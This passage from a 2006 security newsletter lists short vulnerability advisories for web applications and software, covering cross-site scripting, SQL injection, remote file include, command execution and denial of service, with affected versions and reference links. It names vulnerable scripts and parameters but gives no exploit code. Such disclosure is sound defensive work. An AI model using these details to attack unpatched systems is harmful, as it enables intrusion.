Title: Imager JPEG and TGA Images Denial of Service
Description: Imager is a Perl module to manipulate various image file
formats. It is affected by a denial of service issue because it fails
to properly handle JPEG images with 2 or 4 channels or TGA files with
2 channels. Imager version 0.50 has been released to address this
issue.
Ref: http://www.securityfocus.com/bid/17415
______________________________________________________________________
06.15.23 CVE: Not Available
Platform: Cross Platform
Title: fbida FBGS Insecure Temporary File Creation
Description: fbida is a set of applications for viewing image files.
The "fbgs" program creates temporary files in an insecure manner and
with insecure file permissions in "/var/tmp" when the "TMPDIR"
environment variable has not been defined. fbida versions 2.03 and
earlier are affected.
Ref: http://www.securityfocus.com/bid/17436
______________________________________________________________________
06.15.24 CVE: Not Available
Platform: Cross Platform
Title: Cyrus SASL Remote Digest-MD5 Denial of Service
Description: SASL is the Simple Authentication and Security Layer, a
method for adding authentication support to connection-based
protocols. Cyrus SASL is affected by a remote denial of service issue
that occurs prior to successful authentication, allowing anonymous
remote attackers to trigger it. Cyrus SASL version 2.1.21 has been
released to fix this issue.
Ref: http://www.securityfocus.com/bid/17446
______________________________________________________________________
06.15.25 CVE: CVE-2004-2655
Platform: Cross Platform
Title: XScreenSaver Local Password Disclosure
Description: XScreenSaver is a screen saver application. It is
vulnerable to a local password disclosure issue due to failing to
properly grab the keyboard of the local user while it locks the
display. XScreenSaver version 4.18 resolves this issue.
Ref: http://www.jwz.org/xscreensaver/changelog.html
______________________________________________________________________
06.15.26 CVE: Not Available
Platform: Cross Platform
Title: Firefox HTML Parsing Null Pointer Dereference Denial of Service
Description: Mozilla Firefox is vulnerable to a remote denial of
service issue when the browser parses certain malformed HTML content.
Mozilla Firefox versions 1.5.0.1 and earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/430875
______________________________________________________________________
06.15.27 CVE: CVE-2006-1627
Platform: Cross Platform
Title: Adobe Document Server for Reader Extensions Multiple Remote
Vulnerabilities
Description: Adobe Document Server for Reader Extensions, included
with Graphics Server and Document Server, is prone to multiple
vulnerabilities. Please refer to the link provided for further
details. Adobe Document Server for Reader Extensions version 6.0,
included with Adobe Graphics Server 2.1 and Adobe Document Server 6.0,
is vulnerable.
Ref: http://www.adobe.com/support/techdocs/331915.html
http://www.adobe.com/support/techdocs/322699.html
http://www.adobe.com/support/techdocs/331917.html
______________________________________________________________________
06.15.28 CVE: Not Available
Platform: Cross Platform
Title: W3C Amaya Multiple Remote Buffer Overflow Vulnerabilities
Description: W3C Amaya is a web browser and editor application that is
available for many platforms. It is susceptible to multiple remote
buffer overflow vulnerabilities due to improper bounds checking on
user-supplied data to the "colgroup compact", "textarea rows" and
"legend color" tag arguments. Amaya version 9.4 is affected by these
issues.
Ref: http://www.securityfocus.com/bid/17507
______________________________________________________________________
06.15.29 CVE: CVE-2006-1628
Platform: Cross Platform
Title: Adobe LiveCycle OBSOLETE User Access Validation
Description: Adobe LiveCycle is a process management solution for
document services. It is vulnerable to an access validation issue
because a user who has been marked OBSOLETE can still gain access to
LiveCycle Workflow or LiveCycle Form Manager.
Adobe LiveCycle Workflow and LiveCycle Form Manager 7.01 are
vulnerable.
Ref: http://www.adobe.com/support/techdocs/333036.html
______________________________________________________________________
06.15.30 CVE: Not Available
Platform: Cross Platform
Title: Opera Web Browser Stylesheet Attribute Buffer Overflow
Description: Opera is susceptible to a buffer overflow vulnerability.
This issue presents itself when Opera attempts to parse CSS
stylesheets containing attributes with more than approximately 32768
bytes. An integer conversion operation during a string copy causes an
integer overflow, resulting in unintended portions of memory prior to
the destination buffer being overwritten. Opera version 8.52 is
vulnerable to this issue.
Ref: http://www.securityfocus.com/archive/1/430876
______________________________________________________________________
06.15.31 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: phpMyForum Index.PHP Multiple Cross-Site Scripting
Vulnerabilities
Description: phpMyForum is a web-based forum application. Insufficient
sanitization of the "type" and "page" parameters of "index.php" script
exposes the application to multiple cross-site scripting issues.
phpMyForum version 4.0 is affected.
Ref: http://www.securityfocus.com/bid/17420
______________________________________________________________________
06.15.32 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: PHPWebGallery Multiple Cross-Site Scripting Vulnerabilities
Description: PHPWebGallery is a web-based photo gallery application.
Insufficient sanitization of the "cat", "num" and "search" parameters
of the "category.php" script and the "slideshow", "show_metadata" and
"start" parameters of the "picture.php" script exposes the application
to multiple cross-site scripting issues. PhpWebGallery version 1.4.1
is affected.
Ref: http://www.securityfocus.com/bid/17421
______________________________________________________________________
06.15.33 CVE: CVE-2006-1717
Platform: Web Application - Cross Site Scripting
Title: MyBulletinBoard Newthread.PHP Cross-Site Scripting
Description: MyBulletinBoard is web-based bulletin board application.
It is vulnerable to a cross-site scripting issue due to insufficient
sanitization of user-supplied input to the "username" parameter of
"newthread.php" script. MyBulletinBoard version 1.10 is vulnerable.
Ref: http://www.securityfocus.com/archive/1/430464
______________________________________________________________________
06.15.34 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Shadowed Portal Load.PHP Cross-Site Scripting
Description: Shadowed Portal is a web-based content management system.
It is vulnerable to a cross-site scripting issue due to insufficient
sanitization of user-supplied input to the "page" parameter of the
"load.php" script. All versions of Shadowed Portal are considered to
be vulnerable.
Ref: http://liz0zim.no-ip.org/shad0w.txt
______________________________________________________________________
06.15.35 CVE: CVE-2006-1716
Platform: Web Application - Cross Site Scripting
Title: MyBulletinBoard Multiple HTML Injection Vulnerabilities
Description: MyBulletinBoard is a bulletin board application
implemented in PHP. It is prone to multiple HTML-injection
vulnerabilities due to insufficient sanitization of user-supplied
input to the "Email" and "IMG" BBCode tags.
Ref: http://www.securityfocus.com/archive/1/430344
______________________________________________________________________
06.15.36 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: TalentSoft Web+ Shop Deptname Parameter Cross-Site Scripting
Description: TalentSoft Web+ Shop is a web-based ecommerce solution.
It is vulnerable to a cross-site scripting issue due to insufficient
sanitization of user-supplied input to the "deptname" parameter.
TalentSoft Web+ Shop versions 5.0 and earlier are vulnerable.
Ref: http://pridels.blogspot.com/2006/04/web-shop-50-xss.html
______________________________________________________________________
06.15.37 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: JBook Index.PHP Cross-Site Scripting
Description: JBook is a web-based guestbook application implemented in
PHP. It is prone to a cross-site scripting vulnerability due to
insufficient sanitization of user-supplied input to the "page"
parameter of "index.php". JBook version 1.3 is reported to be
vulnerable.
Ref: http://www.securityfocus.com/bid/17419
______________________________________________________________________
06.15.38 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Gallery Unspecified Cross-Site Scripting
Description: Gallery is a web-based photo gallery application.
Insufficient sanitization of user supplied input exposes the
application to a cross-site scripting issue. Gallery version 1.5.3 has
been released to address this issue.
Ref: http://www.securityfocus.com/bid/17437
______________________________________________________________________
06.15.39 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: XMB Forum Flash Video Cross-Site Scripting
Description: XMB Forum is a web-based message board application. It is
prone to a cross-site scripting vulnerability due to insufficient
sanitization of user-supplied input to Flash videos. An attacker can
execute javascript by using "ActionScript", a built-in language of
Flash. XMB Forum version 1.9.5 is affected.
Ref: http://www.securityfocus.com/bid/17445
______________________________________________________________________
06.15.40 CVE: CVE-2006-1759
Platform: Web Application - Cross Site Scripting
Title: SWSoft Confixx Jahr Parameter Cross-Site Scripting
Description: Confixx is a control panel system for Web sites. It is
vulnerable to a cross-site scripting issue due to insufficient
sanitization of user-supplied input to the "jahr" parameter of the
"allgemein_transfer.php" script. SWSoft Confixx 3.1.2 is vulnerable.
Ref: http://www.frsirt.com/english/advisories/2006/1331
______________________________________________________________________
06.15.41 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: JetPhoto Multiple Cross-Site Scripting Vulnerabilities
Description: JetPhoto is a web-based photo gallery application. It is
vulnerable to multiple cross-site scripting issues due to insufficient
sanitization of user-supplied input to the "page" parameter of the
"thumbnail.php" script, the "gallery.php" and "detail.php" script, and
the name parameter of the "slideshow.php" script. JetPhoto versions
2.1 and earlier are vulnerable.
Ref: http://www.securityfocus.com/bid/17449/info
______________________________________________________________________
06.15.42 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Tritanium Bulletin Board Multiple Cross-Site Scripting
Vulnerabilities
Description: Tritanium Bulletin Board is a bulletin board application.
It is vulnerable to multiple cross-site scripting issues due to
insufficient sanitization of user-supplied input to the
"newuser_name", "newuser_email", and "newuser_hp" parameters of the
"index.php" script. Tritanium Bulletin Board version 1.2.3 is
vulnerable.
Ref: http://www.securityfocus.com/archive/1/430669
______________________________________________________________________
06.15.43 CVE: CVE-2006-1562
Platform: Web Application - Cross Site Scripting
Title: Manila Multiple Cross-Site Scripting Vulnerabilities
Description: Manila is a web-log application written for the MacOS and
Microsoft Windows platforms. It is prone to multiple cross-site
scripting vulnerabilities. Manila versions 9.5 and prior are
vulnerable.
Ref: http://www.securityfocus.com/archive/1/430668
______________________________________________________________________
06.15.44 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: Autogallery Multiple Cross-Site Scripting Vulnerabilities
Description: Autogallery is a news reader application. It is
vulnerable to multiple cross-site scripting issues due to insufficient
sanitization of user-supplied input to the "pic" and "show" parameters
of the "index.php" script. AutoGallery version 0.41 is vulnerable.
Ref: http://www.securityfocus.com/bid/17480/info
______________________________________________________________________
06.15.45 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: interaktiv.shop Multiple Cross-Site Scripting Vulnerabilities
Description: interaktiv.shop is a shopping cart application.
Insufficeint sanitization of the "interaktiv.shop" script and the "pn"
and "sbeg" parameters of the "shop_main.cgi" script exposes the
application to a cross site scripting issue. interaktiv.shop versions
5 and earlier are affected.
Ref: http://www.securityfocus.com/bid/17485
______________________________________________________________________
06.15.46 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: phpMyAdmin SQL.PHP Cross-Site Scripting
Description: phpMyAdmin is a web-based administration tool for mySQL
databases. It is affected by a cross-site scripting issue due to
insufficient sanitization of user supplied input to the "sql_query"
parameter of the "sql.php" script. phpMyAdmin version 2.7 -pl1 is
affected.
Ref: http://www.securityfocus.com/bid/17487
______________________________________________________________________
06.15.47 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: MyBB Member.PHP Cross-Site Scripting
Description: MyBB is prone to a cross-site scripting vulnerability due
to improper sanitization of user-supplied input. Since the "url"
parameter is not properly sanitized when submitted to the "member.php"
script, an attacker can submit malicious HTML and script code. MyBB
version 1.10 is vulnerable; other versions may also be affected.
Ref: http://www.securityfocus.com/bid/17492/exploit
______________________________________________________________________
06.15.48 CVE: CVE-2006-1779
Platform: Web Application - Cross Site Scripting
Title: Simplog Login.PHP Cross-Site Scripting
Description: Simplog is a web log application, written in PHP. Simplog
is prone to a cross-site scripting vulnerability due to insufficient
sanitization of user-supplied input to the "btag" parameter of the
"login.php" script.
Ref: http://milw0rm.com/exploits/1663
______________________________________________________________________
06.15.49 CVE: Not Available
Platform: Web Application - Cross Site Scripting
Title: PatroNet CMS Index.PHP Cross-Site Scripting
Description: PatroNet CMS is a content management application. It is
prone to a cross-site scripting vulnerability due to insufficient
sanitization of user-supplied input to the "index.php" script.
Ref: http://www.securityfocus.com/bid/17495
______________________________________________________________________
06.15.50 CVE: Not Available
Platform: Web Application - SQL Injection
Title: XBrite Members.PHP SQL Injection
Description: XBrite is a web based application. Insufficient
sanitization of the "id" parameter of the "members.php" script exposes
the appliction to a SQL injection issue. XBrite version 1.1 is
affected.
Ref: http://www.securityfocus.com/bid/17421
______________________________________________________________________
06.15.51 CVE: Not Available
Platform: Web Application - SQL Injection
Title: APT-webshop Modules.PHP Multiple SQL Injection Vulnerabilities
Description: APT-webshop is a shopping cart application. It is
vulnerable to multiple SQL injection issues due to insufficient
sanitization of user-supplied input to the "id", "seite" and "group"
parameters of the "modules.php" script. APT-webshop versions 3.0
light, 3.0 basic, and 4.0 pro are vulnerable.
Ref: http://pridels.blogspot.com/2006/04/apt-webshop-system-vuln.html
______________________________________________________________________
06.15.52 CVE: Not Available
Platform: Web Application - SQL Injection
Title: dnGuestbook Admin.PHP SQL Injection Vulnerabilities
Description: dnGuestbook is a guestbook script for websites
implemented in PHP. It is prone to SQL injection vulnerabilities due
to insufficient sanitization of user-supplied input to the "mail" and
"id" parameters of the "admin.php" script. dnGuestbook version 2.0 is
vulnerable.
Ref: http://www.securityfocus.com/bid/17435
______________________________________________________________________
06.15.53 CVE: Not Available
Platform: Web Application - SQL Injection
Title: ShopWeezle Multiple SQL Injection Vulnerabilities
Description: ShopWeezle is an e-commerce application. It is vulnerable
to multiple SQL injection issues due to insufficient sanitization of
user-supplied input to the "logon.php", "index.php" and "memo.php"
scripts. ShopWeezle version 2.0 is vulnerable.
Ref:
http://pridels.blogspot.com/2006/04/shopweezle-20-multiple-vuln.html
______________________________________________________________________
06.15.54 CVE: CVE-2006-1708
Platform: Web Application - SQL Injection
Title: Clansys Index.PHP SQL Injection
Description: Clansys is a web based application. It is vulnerable to
an SQL injection issue due to insufficient sanitization of
user-supplied to the "showid" parameter of the "index.php" script.
Clansys version 1.1 is vulnerable.
Ref: http://www.securityfocus.com/bid/17456/discuss
______________________________________________________________________
06.15.55 CVE: CVE-2006-1743
Platform: Web Application - SQL Injection
Title: JBook Form.PHP SQL Injection Vulnerabilities
Description: JBook is a web-based guestbook application implemented in
PHP. It is prone to SQL injection vulnerabilities due to improper
sanitization of user-supplied input to the "mail" and "nom" parameters
of the "form.php" script.
Ref: http://www.securityfocus.com/bid/17458
______________________________________________________________________
06.15.56 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Dokeos Viewtopic.PHP SQL Injection
Description: Dokeos is a web-based e-learning and course management
application. Insufficient sanitization of the "topic" parameter of the
"viewtopic.php" script exposes the application to a SQL injection
issue. All current versions are affected.
Ref: http://www.securityfocus.com/bid/17463
______________________________________________________________________
06.15.57 CVE: CVE-2006-1773
Platform: Web Application - SQL Injection
Title: PHPKIT Include.PHP SQL Injection
Description: PHPKIT is a web-based e-learning and course management
application implemented in PHP. It is prone to an SQL injection
vulnerability due to insufficient sanitization of user-supplied input
to the "contentid" parameter of the "include.php" script.
Ref: http://www.securityfocus.com/bid/17467
______________________________________________________________________
06.15.58 CVE: Not Available
Platform: Web Application - SQL Injection
Title: SWSoft Confixx Index.PHP SQL Injection
Description: Confixx is a web-based control panel application
implemented in PHP. It is prone to an SQL injection vulnerability due
to insufficient sanitization of user-supplied input to the "SID"
parameter of the "index.php" script. SWSoft Confixx versions 3.1.2,
3.0.8 and 3.0.6 are affected.
Ref: http://www.securityfocus.com/bid/17476
______________________________________________________________________
06.15.59 CVE: Not Available
Platform: Web Application - SQL Injection
Title: Chipmunk Guestbook Index.PHP SQL Injection
Description: Chipmunk Guestbook is a guest book application
implemented in PHP. It is prone to an SQL injection vulnerability due
to insufficient sanitization of user-supplied input to the "username"
parameter of the "index.php" script. Chipmunk Guestbook version 1.3 is
affected.
Ref: http://www.securityfocus.com/bid/17483
______________________________________________________________________
06.15.60 CVE: CVE-2006-1778
Platform: Web Application - SQL Injection
Title: Simplog Multiple SQL Injection Vulnerabilities
Description: Simplog is a web-based news application. It is vulnerable
to multiple SQL injection issues due to insufficient sanitization of
user-supplied input to the "index.php" script. Simplog version 0.9.2
is vulnerable.
Ref: http://milw0rm.com/exploits/1663
______________________________________________________________________
06.15.61 CVE: Not Available
Platform: Web Application - SQL Injection
Title: PHP121 PHP121LOGIN.PHP SQL Injection
Description: PHP121 is a web-based instant messaging application. It
is vulnerable to an SQL injection issue due to insufficient
sanitization to the "php121login.php" script. PHP121 version 1.4 is
vulnerable.
Ref:
http://downloads.securityfocus.com/vulnerabilities/exploits/PHP121_poc
______________________________________________________________________
06.15.62 CVE: CVE-2006-1746
Platform: Web Application
Title: PHPList Index.PHP Local File Include
Description: PHPList is a web-based utility to manage personalized
mailing and customer lists. It is prone to a local file include
vulnerability. The problem presents itself in "lists/index.php" when
the "GLOBALS[database_module]" is not properly sanitized of directory
traversal sequences.
Ref: http://www.securityfocus.com/archive/1/430597
______________________________________________________________________
06.15.63 CVE: Not Available
Platform: Web Application
Title: SIRE Arbitrary File Upload
Description: SIRE is a content management web application implemented
in PHP. It is prone to an arbitrary file upload vulnerability because
input to the "upload.php" script is not properly sanitized allowing
arbitrary files to be uploaded to the webroot. SIRE version 2.0 is
affected.
Ref: http://www.securityfocus.com/bid/17431
______________________________________________________________________
06.15.64 CVE: CVE-2006-1702
Platform: Web Application
Title: SPIP Spip_login.PHP Remote File Include
Description: SPIP is a website publishing application. It is
vulnerable to a remote file include issue due to insufficient
sanitization of user-supplied input to the "url" variable of the
"spip_login.php" script. SPIP version 1.8.3 is vulnerable.
Ref: http://www.securityfocus.com/bid/17423/info
______________________________________________________________________
06.15.65 CVE: Not Available
Platform: Web Application
Title: VegaDNS Multiple Input Validation Vulnerabilities
Description: VegaDNS is a tinyDNS administration application. It is
vulnerable to multiple input validation issues due to insufficient
sanitization of user-supplied input to the "index.php" and "users.php"
scripts. VegaDNS version 0.9.9 is vulnerable.
Ref: http://www.securityfocus.com/archive/1/430474
______________________________________________________________________
06.15.66 CVE: CVE-2006-1610
Platform: Web Application
Title: SQuery LibPath Parameter Multiple Remote File Include
Vulnerabilities
Description: SQuery is a game server and query module. SQuery is prone
to multiple remote file include vulnerabilities due to insufficient
sanitization of user-supplied input to the "libpath" parameter of
various scripts.
Ref: http://liz0zim.no-ip.org/alp.txt
______________________________________________________________________
06.15.67 CVE: CVE-2006-1700
Platform: Web Application
Title: AWeb's Scripts Seller Buy.PHP Authorization Bypass
Description: AWeb's Scripts Seller is a web-based application for
selling code. It is vulnerable to an authorization bypass issue due to
predictable cookie data. Currently all versions of AWeb's Scripts
Seller is vulnerable.
Ref: http://www.securityfocus.com/bid/17417/info
______________________________________________________________________
06.15.68 CVE: CVE-2006-1697
Platform: Web Application
Title: Matt Wright Guestbook Guestbook.PL Multiple HTML Injection
Vulnerabilities
Description: Matt Wright's Guestbook is a guest book application. It
is vulnerable to multiple HTML injection issues due to insufficient
sanitization of user-supplied input to the "guestbook.pl" script. Matt
Wright's GuestBook version 2.3.1 is vulnerable.
Ref: http://liz0zim.no-ip.org/mattguestbook.html
______________________________________________________________________
06.15.69 CVE: CVE-2006-1608, CVE-2006-1494
Platform: Web Application
Title: PHP Multiple Safe_Mode and Open_Basedir Restriction Bypass
Vulnerabilities
Description: PHP is a general purpose web scripting language. It is
vulnerable to multiple "safe_mode" and "open_basedir" restriction
bypass issues. PHP versions 4.4.2 and 5.1.2 are vulnerable.
Ref: http://www.securityfocus.com/archive/1/430461
______________________________________________________________________
06.15.70 CVE: CVE-2006-1747
Platform: Web Application
Title: VWar Admin.PHP Remote File Include
Description: VWar is a team organizer application written in PHP. VWar
is prone to a remote file include vulnerability. The application fails
to properly sanitize user-supplied input to the "vwar_root" parameter
of the "admin.php" script.
Ref: http://www.milw0rm.com/exploits/1658
______________________________________________________________________
06.15.71 CVE: CVE-2006-1770
Platform: Web Application
Title: AzDGVote Remote File Include
Description: AzDGVote is a web-based voting application. AzDGVote is
prone to a remote file include vulnerability because the application
fails to properly sanitize user-supplied input to the "int_path"
parameter of the "view.php", "vote.php", "admin.php", and
"/admin/index.php" scripts.
Ref: http://www.securityfocus.com/bid/17447
______________________________________________________________________
06.15.72 CVE: CVE-2006-1749
Platform: Web Application
Title: SmartISoft phpListPro Config.PHP Remote File Include
Description: SmartISoft phpListPro is a web based top site
application. It is vulnerable to a remote file include issue
insufficient sanitization of user-supplied input to the "returnpath"
parameter of the "config.php" script. SmartISoft phpListPro versions
2.0 and earlier are vulnerable.
Ref: http://www.securityfocus.com/archive/1/430614
______________________________________________________________________
06.15.73 CVE: Not Available
Platform: Web Application
Title: Clever Copy Connect.INC Information Disclosure
Description: Clever Copy is a website portal and news posting system.
It is prone to an information disclosure vulnerability because the
contents of the "connect.inc" file can be viewed by remote,
unprivileged users. Sensitive configuration information, such as the
username and password for the back end database administrator account
can be obtained from this file. Clever Copy version 3.0 is affected.
Ref: http://www.securityfocus.com/bid/17461
______________________________________________________________________
06.15.74 CVE: Not Available
Platform: Web Application
Title: Blursoft Blur6ex Multiple Input Validation Vulnerabilities
Description: Blur6ex is a web-based blog and content management system
implemented in PHP. It is prone to multiple input-validation
vulnerabilities.
Ref: http://www.securityfocus.com/archive/1/430607
______________________________________________________________________
06.15.75 CVE: CVE-2006-0164
Platform: Web Application
Title: Phgstats Phgstats.Inc.PHP Remote File Include
Description: Phgstats is a gameserver status script. It is affected by
a remote file include issue due to insufficient sanitization of the
"phgdir" variable in the "phgstats.inc.php" script. Phgstats version
0.5.2 has been released to address this issue.
Ref: http://www.securityfocus.com/bid/17469
______________________________________________________________________
06.15.76 CVE: CVE-2006-1767
Platform: Web Application
Title: Indexu Multiple Remote File Include Vulnerabilities
Description: The "indexu" application is software for creating
indexing websites through managing and organizing links. The "indexu"
application is prone to multiple remote file include vulnerabilities.
These issues are reported to affect versions 5.0.0 and 5.0.1.
Ref: http://www.securityfocus.com/archive/1/430599
______________________________________________________________________
06.15.77 CVE: Not Available
Platform: Web Application
Title: Saxopress URL Parameter Directory Traversal
Description: SAXoPRESS is a web content management system. It is prone
to a directory traversal vulnerability due to improper sanitization of
user-supplied input. The problem occurs with specially crafted HTTP
GET requests containing directory traversal strings supplied through
the "url" parameter.
Ref: http://www.securityfocus.com/bid/17474/exploit
______________________________________________________________________
06.15.78 CVE: Not Available
Platform: Web Application
Title: MvBlog Multiple Input Validation Vulnerabilities
Description: MvBlog is a web log application implemented in PHP. It is
prone to multiple input validation vulnerabilities due to improper
sanitization of user-supplied input. MyBlog version 1.5 is affected.
Ref: http://www.securityfocus.com/bid/17481
______________________________________________________________________
06.15.79 CVE: CVE-2006-1711
Platform: Web Application
Title: Plone MembershipTool Access Control Bypass
Description: Plone is a content management system developed for the
Zope web application platform. It is susceptible to a remote access
control bypass vulnerability due to improper enforcing of privileges
to various MembershipTool methods. This issue allows remote, anonymous
attackers to modify and delete portrait images of members. All
versions of Plone 2 are vulnerable.
Ref: http://plone.org/products/plonehotfix20060410/
______________________________________________________________________
06.15.80 CVE: Not Available
Platform: Web Application
Title: Simplog Remote File Include
Description: Simplog is a web log application. Insufficient
sanitization of the "s" parameter of the "doc/index.php" script
exposes the application to a remote file include issue. Simplog
version 0.9.2 is affetced.
Ref: http://www.securityfocus.com/bid/17490
______________________________________________________________________
06.15.81 CVE: Not Available
Platform: Web Application
Title: SimpleBBS Remote Arbitrary Command Execution
Description: SimpleBBS is a web-based bulletin board application. It
is prone to an arbitrary command execution vulnerability due to
insufficient sanitization of user-supplied input to the "cmd"
parameter of "posts.php". SimpleBBS versions 1.1 and earlier are
vulnerable.
Ref: http://www.securityfocus.com/bid/17501
______________________________________________________________________
06.15.82 CVE: Not Available
Platform: Web Application
Title: Censtore Remote Arbitrary Command Execution
Description: Censtore is a web-based shopping cart system. It is prone
to an arbitrary command execution vulnerability due to insufficient
sanitization of user-supplied input to the "page" parameter of the
"censtore.cgi" script.
Ref: http://www.securityfocus.com/bid/17515
______________________________________________________________________
06.15.83 CVE: Not Available
Platform: Web Application
Title: Sphider Configset.PHP Remote File Include
Description: Sphider is a web-based spider and search engine
application. Insufficient sanitization of the "settings_dir" parameter
of the "admin/configset.php" script exposes the application to a
remote file include issue. Sphider version 1.3 is affected.
Ref: http://www.securityfocus.com/bid/17514
______________________________________________________________________
(c) 2006. All rights reserved. The information contained in this
newsletter, including any external links, is provided "AS IS," with no
express or implied warranty, for informational purposes only. In some
cases, copyright for material in this newsletter may be held by a party
other than Qualys (as indicated herein) and permission to use such
material must be requested from the copyright owner.
==end==
Subscriptions: RISK is distributed free of charge to people responsible
for managing and securing information systems and networks. You may
forward this newsletter to others with such responsibility inside or
outside your organization.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)
iD8DBQFEQ9ba+LUG5KFpTkYRAmNWAJ9mNVsM803cFip0Twap9W8VztvofwCeNaZN
WJU3Y0b3G6HWn+jk0t5ZtQc=
=vtSf
-----END PGP SIGNATURE-----
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]